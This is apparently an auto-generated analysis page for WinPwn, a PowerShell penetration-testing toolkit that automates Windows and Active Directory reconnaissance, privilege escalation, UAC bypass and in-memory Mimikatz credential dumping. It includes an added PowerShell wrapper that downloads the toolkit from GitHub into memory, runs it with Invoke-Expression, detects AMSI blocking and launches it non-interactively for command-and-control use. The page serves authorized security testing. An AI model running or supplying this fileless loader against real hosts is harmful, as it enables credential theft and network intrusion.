Analysis updated 2026-07-03
Run automated local and Active Directory reconnaissance on a Windows network during an authorized penetration test.
Dump credentials from memory using Mimikatz without dropping a file to disk on the target host.
Check a Windows domain for privilege escalation paths and known CVEs across OS versions from XP through Server 2019.
Run the toolkit non-interactively through a Cobalt Strike or Covenant command-and-control framework.
| Metric | s3cur3th1ssh1t/winpwn | 0xsyr0/oscp | mantvydasb/redteaming-tactics-and-techniques |
|---|---|---|---|
| Stars | 3,664 | 3,728 | 4,590 |
| Language | PowerShell | PowerShell | PowerShell |
| Setup difficulty | moderate | easy | hard |
| Complexity | 4/5 | 1/5 | 4/5 |
| Audience | ops devops | ops devops | developer |
Figures from each repo's GitHub metadata at analysis time.
On most modern Windows systems the script cannot be imported until AMSI (the Antimalware Scan Interface, which Windows Defender and other antivirus engines use to inspect script content before it runs) has been bypassed; the README covers this. Note that both the in-memory download and the bypass itself are visible in PowerShell script block logging if it is enabled on the target.
WinPwn is a PowerShell script that automates common tasks in internal penetration tests of Windows environments and Active Directory networks. The author built it after repeatedly running the same individual security scripts one after another during engagements and wanting a single tool that also handled proxy detection automatically, since many corporate networks only reach the internet through a proxy.

The script wraps a large number of well-known offensive tools and techniques into menu-driven functions. The main categories are: local reconnaissance (collecting installed software, network configuration and group memberships, and searching the registry and file system for stored passwords); domain reconnaissance (mapping an Active Directory environment, finding misconfigurations, generating BloodHound reports, and checking domain systems for known vulnerabilities); privilege escalation (checking for weak permissions and for kernel exploits tied to specific CVEs across Windows versions from XP through Server 2019); credential dumping (running Mimikatz in memory to extract passwords and hashes, dumping browser credentials, and extracting saved Wi-Fi passwords); and User Account Control bypasses.

The tool can run interactively, with menus for selecting options, or with the -noninteractive and -consoleoutput flags so that it works from a command-and-control framework such as Cobalt Strike or Covenant without any user interaction. An offline version bundles the most important scripts and executables for environments with no internet access. It is imported by running a single PowerShell command. The README notes that AMSI, the Antimalware Scan Interface that Windows Defender and other antivirus engines use to scan script content before it executes, may block the import, and it points to published bypass techniques for working around that. The tool is intended for professional penetration testers and security researchers working against systems they are authorized to test.
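The import mechanics described above (a single in-memory download-and-execute command, automatic proxy detection, the AMSI block on import, and a non-interactive run for C2 use) are shown here as an added example. This is not code from the WinPwn repository or its author; it is a wrapper a tester might write around it. The raw script URL, the entry-point function name `WinPwn`, and the error identifier used to recognise an AMSI block are assumptions to verify against the README and your own PowerShell version.

```powershell
# Added example, not WinPwn's own code. Downloads a script to memory through
# whatever proxy the host is configured to use, reports whether AMSI blocked
# the import, and then runs the toolkit non-interactively.
param(
    # Assumed raw-file path; confirm the current URL in the project README.
    [string]$ScriptUrl = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1'
)

# 1. Proxy detection. Many corporate hosts reach the internet only through a
#    proxy; ask the system proxy settings what they would use for this URL
#    and authenticate to it with the current user's credentials.
$uri   = [System.Uri]$ScriptUrl
$proxy = [System.Net.WebRequest]::GetSystemWebProxy()
$proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
$proxyUri = $proxy.GetProxy($uri)
if ($proxyUri -ne $uri) {
    Write-Host "Proxy in use for $($uri.Host): $proxyUri"
} else {
    Write-Host "Direct connection to $($uri.Host) (no proxy configured)"
}

$client = New-Object System.Net.WebClient
$client.Proxy = $proxy
$client.UseDefaultCredentials = $true

# 2. Fetch the script text into a variable; nothing is written to disk.
try {
    $scriptText = $client.DownloadString($ScriptUrl)
} catch {
    Write-Warning "Download failed: $($_.Exception.Message)"
    return
}

# 3. Import. When AMSI flags the content, Invoke-Expression throws a
#    ParseException; in current Windows PowerShell its FullyQualifiedErrorId
#    is ScriptContainedMaliciousContent and the message says the script was
#    blocked by antivirus software (both checked here as an assumption).
try {
    Invoke-Expression $scriptText
} catch [System.Management.Automation.ParseException] {
    $amsiBlocked = ($_.FullyQualifiedErrorId -eq 'ScriptContainedMaliciousContent') -or
                   ($_.Exception.Message -match 'blocked by your antivirus')
    if ($amsiBlocked) {
        Write-Warning 'AMSI blocked the import. Apply one of the bypasses referenced in the README, then retry.'
    } else {
        Write-Warning "Import failed to parse: $($_.Exception.Message)"
    }
    return
}

# 4. Non-interactive run, as a C2 task would invoke it: no menu is drawn and
#    output goes to the console so the framework can capture it. The function
#    name 'WinPwn' is assumed; any additional module-selection flags are
#    documented in the README and are not invented here.
if (Get-Command -Name WinPwn -ErrorAction SilentlyContinue) {
    WinPwn -noninteractive -consoleoutput
} else {
    Write-Warning 'Import succeeded but the expected entry-point function was not defined.'
}
```

Run it from a PowerShell session on the authorized target (or paste it as a C2 PowerShell task). The AMSI branch only tells you that the import was blocked; it deliberately does not include a bypass, because which published technique still works depends on the Defender version on the host.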
A PowerShell toolkit that automates common Windows and Active Directory penetration testing tasks (reconnaissance, privilege escalation, and credential dumping) in a single menu-driven script with automatic proxy detection.
Mainly PowerShell; the toolkit also wraps Mimikatz and BloodHound.
Setup difficulty is rated moderate, with roughly 30 minutes to a first successful run.
Audience: mainly ops and devops.
Verify against the repo before relying on details.